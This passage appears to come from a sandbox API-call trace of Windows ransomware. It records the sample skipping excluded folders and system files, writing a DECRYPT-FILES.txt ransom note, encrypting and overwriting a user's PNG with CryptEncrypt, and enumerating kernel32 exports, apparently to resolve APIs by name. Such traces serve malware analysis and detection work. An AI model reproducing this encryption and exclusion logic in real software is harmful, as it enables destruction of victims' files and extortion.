lpSrch="\\Tor Browser\\") returned 0x0 [0086.546] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\", lpSrch="\\ProgramData\\") returned 0x0 [0086.546] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0086.546] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0086.546] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0086.546] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\", lpSrch="\\All Users") returned 0x0 [0086.546] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\", lpSrch="\\IETldCache\\") returned 0x0 [0086.546] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\", lpSrch="\\Local Settings\\") returned 0x0 [0086.546] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\", lpSrch="\\AppData\\Local") returned 0x0 [0086.546] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\", lpSrch="AhnLab") returned 0x0 [0086.546] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0086.546] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\") returned 51 [0086.546] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0086.546] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\\\jkbimi8.tmp") returned 63 [0086.546] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zelljvzmnja\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x410 [0086.547] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\") returned 51 [0086.547] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0086.547] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\\\DECRYPT-FILES.txt") returned 69 [0086.547] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zelljvzmnja\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0086.547] WriteFile (in: hFile=0x414, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e6b0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e6b0*=0x23fc, lpOverlapped=0x0) returned 1 [0086.548] CloseHandle (hObject=0x414) returned 1 [0086.548] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\") returned 51 [0086.548] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\*" [0086.548] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\*", lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3860b20, ftCreationTime.dwHighDateTime=0x1d4ca14, ftLastAccessTime.dwLowDateTime=0xafc916e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xafc916e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c98 [0086.548] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.548] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3860b20, ftCreationTime.dwHighDateTime=0x1d4ca14, ftLastAccessTime.dwLowDateTime=0xafc916e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xafc916e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0086.548] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.548] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.548] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0806d00, ftCreationTime.dwHighDateTime=0x1d4d15e, ftLastAccessTime.dwLowDateTime=0xa7d8f9f0, ftLastAccessTime.dwHighDateTime=0x1d4d1ce, ftLastWriteTime.dwLowDateTime=0xa7d8f9f0, ftLastWriteTime.dwHighDateTime=0x1d4d1ce, nFileSizeHigh=0x0, nFileSizeLow=0x1800, dwReserved0=0x0, dwReserved1=0x0, cFileName="9MoUg27.png", cAlternateFileName="")) returned 1 [0086.549] lstrcmpiW (lpString1="9MoUg27.png", lpString2="DECRYPT-FILES.txt") returned -1 [0086.549] lstrcmpiW (lpString1="9MoUg27.png", lpString2="autorun.inf") returned -1 [0086.549] lstrcmpiW (lpString1="9MoUg27.png", lpString2="boot.ini") returned -1 [0086.549] lstrcmpiW (lpString1="9MoUg27.png", lpString2="desktop.ini") returned -1 [0086.549] lstrcmpiW (lpString1="9MoUg27.png", lpString2="ntuser.dat") returned -1 [0086.549] lstrcmpiW (lpString1="9MoUg27.png", lpString2="iconcache.db") returned -1 [0086.549] lstrcmpiW (lpString1="9MoUg27.png", lpString2="bootsect.bak") returned -1 [0086.549] lstrcmpiW (lpString1="9MoUg27.png", lpString2="ntuser.dat.log") returned -1 [0086.549] lstrcmpiW (lpString1="9MoUg27.png", lpString2="thumbs.db") returned -1 [0086.549] lstrcmpiW (lpString1="9MoUg27.png", lpString2="Bootfont.bin") returned -1 [0086.549] lstrlenW (lpString="9MoUg27.png") returned 11 [0086.549] lstrcmpiW (lpString1="png", lpString2="lnk") returned 1 [0086.549] lstrcmpiW (lpString1="png", lpString2="exe") returned 1 [0086.549] lstrcmpiW (lpString1="png", lpString2="sys") returned -1 [0086.549] lstrcmpiW (lpString1="png", lpString2="dll") returned 1 [0086.549] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\") returned 51 [0086.549] lstrlenW (lpString="9MoUg27.png") returned 11 [0086.549] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\" [0086.549] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\", lpString2="9MoUg27.png" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\9MoUg27.png") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\9MoUg27.png" [0086.549] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.549] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\9MoUg27.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zelljvzmnja\\9moug27.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0086.550] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=6144) returned 1 [0086.550] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0086.550] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0086.550] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0086.550] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0086.550] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0086.550] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0086.550] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0086.551] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.551] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0086.551] CloseHandle (hObject=0x42c) returned 1 [0086.551] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.552] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0086.552] CloseHandle (hObject=0x0) returned 0 [0086.552] CloseHandle (hObject=0x428) returned 1 [0086.552] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.553] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.553] GetTickCount () returned 0x114e16a [0086.553] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.553] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0086.553] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0086.553] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0086.554] lstrlenA (lpString="kernel32.dll") returned 12 [0086.554] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0086.554] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0086.554] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0086.554] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0086.554] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0086.554] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0086.554] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0086.554] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0086.554] lstrlenA (lpString="ADDATOMA") returned 8 [0086.554] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0086.554] lstrlenA (lpString="ADDATOMW") returned 8 [0086.554] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0086.554] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0086.554] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0086.554] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0086.554] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0086.554] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0086.554] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0086.554] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0086.554] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0086.554] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0086.554] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0086.554] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0086.554] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0086.555] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0086.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0086.555] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0086.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0086.555] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0086.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0086.555] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0086.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0086.555] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0086.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0086.555] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0086.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0086.555] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0086.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0086.555] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0086.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0086.555] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0086.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0086.555] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0086.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0086.555] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0086.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0086.555] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0086.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0086.555] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0086.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0086.555] lstrlenA (lpString="BACKUPREAD") returned 10 [0086.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0086.555] lstrlenA (lpString="BACKUPSEEK") returned 10 [0086.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0086.555] lstrlenA (lpString="BACKUPWRITE") returned 11 [0086.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0086.555] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0086.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0086.555] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0086.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0086.555] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0086.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0086.556] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0086.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0086.556] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0086.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0086.556] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0086.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0086.556] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0086.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0086.556] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0086.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0086.556] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0086.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0086.556] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0086.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0086.556] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0086.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0086.556] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0086.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0086.556] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0086.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0086.556] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0086.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0086.556] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0086.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0086.556] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0086.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0086.556] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0086.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0086.556] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0086.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0086.556] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0086.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0086.556] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0086.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0086.556] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0086.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0086.557] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0086.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0086.557] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0086.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0086.557] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0086.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0086.557] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0086.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0086.557] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0086.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0086.557] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0086.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0086.557] lstrlenA (lpString="BEEP") returned 4 [0086.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0086.557] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0086.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0086.557] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0086.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0086.557] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0086.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0086.557] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0086.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0086.557] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0086.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0086.557] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0086.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0086.557] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0086.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0086.557] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0086.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0086.557] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0086.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0086.557] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0086.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0086.557] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0086.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0086.558] lstrlenA (lpString="CANCELIO") returned 8 [0086.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0086.558] lstrlenA (lpString="CANCELIOEX") returned 10 [0086.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: 